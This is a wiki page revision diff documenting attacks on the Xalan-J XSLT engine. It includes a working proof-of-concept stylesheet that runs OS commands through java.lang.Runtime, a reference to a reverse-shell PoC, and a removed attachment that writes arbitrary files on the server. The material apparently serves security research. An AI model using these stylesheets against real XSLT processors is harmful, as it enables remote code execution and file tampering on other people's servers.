Changes for page Engine_XalanJ
on 2012/01/12 08:39
on 2012/01/11 23:47
Summary
-
Page properties (1 modified, 0 added, 0 removed)
-
Attachments (0 modified, 0 added, 1 removed)
Details
- Page properties
-
- Content
-
... ... @@ -50,20 +50,25 @@ 50 50 51 51 == OS command execution == 52 52 53 -Once Java code execution is possible, it is trivial to execute arbitrary OS commands using the java.lang.Runtime class. The attached PoC will not read the output of the executed command (because loops are hard in XSLT) .But this is not a problem if a reverse-shell have already been started, isn't it ;-)53 +Once Java code execution is possible, it is trivial to execute arbitrary OS commands using the java.lang.Runtime class. The attached PoC will not read the output of the executed command (because loops are hard in XSLT), but this is not a problem if a reverse-shell have already been started, isn't it ;-) 54 54 55 -|=Namespace|=Extension functions|=PoC 56 -|http:~/~/xml.apache.org/xalan/java|split(), getRuntime(), exec() and toString()|[[xalanj-reverse-bash.xsl>>attach:xalanj-reverse-bash.xsl]] 57 57 58 - __Note__: as arrays are not a native type in XSLT, we create onein Java via split() before passing it as an argument to[[exec(String[] cmdarray)>>http://docs.oracle.com/javase/1.4.2/docs/api/java/lang/Runtime.html#exec(java.lang.String[])||rel="__blank"]].56 +Note : as arrays are not a native type in XSLT, we create one via split() before passing it as an argument to exec(String[] cmdarray). 59 59 60 -== File creation == 61 61 62 -The "write" extension element allows to create files on the engine side. The content written to the file must be valid UTF-8 (so plain ASCII works too). Existing files can be overwritten. 63 63 64 -|=Namespace|=Extension element|=Parameter|=PoC 65 -|http:~/~/xml.apache.org/xalan/redirect|write|file|[[xalanj-write.xsl>>attach:xalanj-write.xsl]] 60 +The following code will execute the command "touch /tmp/hello" : 66 66 67 -== JDBC connectivity == 68 - 69 -It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver. 62 +<?xml version="1.0"?> 63 +<xsl:stylesheet xmlns:xsl="http:~/~/www.w3.org/1999/XSL/Transform" 64 + xmlns:j="http:~/~/xml.apache.org/xalan/java" 65 + exclude-result-prefixes="j" 66 + version="1.0"> 67 + <xsl:template match="/"> 68 + <xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable> 69 + <xsl:variable name="a" select="j:split($c, ' = ')"/> 70 + <xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/> 71 + <xsl:variable name="p" select="j:exec($r, $a )"/> 72 + No content at the moment ... 73 + </xsl:template> 74 +</xsl:stylesheet>
- xalanj-write.xsl
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -373 bytes - Content
-
... ... @@ -1,13 +1,0 @@ 1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 2 - xmlns:redir="http://xml.apache.org/xalan/redirect" 3 - extension-element-prefixes="redir" 4 - version='1.0'> 5 - 6 - <xsl:template match="/"> 7 - <redir:write file="/tmp/created_by_xalanj_write" method="text"> 8 - <xsl:text>Just a PoC</xsl:text> 9 - </redir:write> 10 - </xsl:template> 11 - 12 -</xsl:stylesheet> 13 -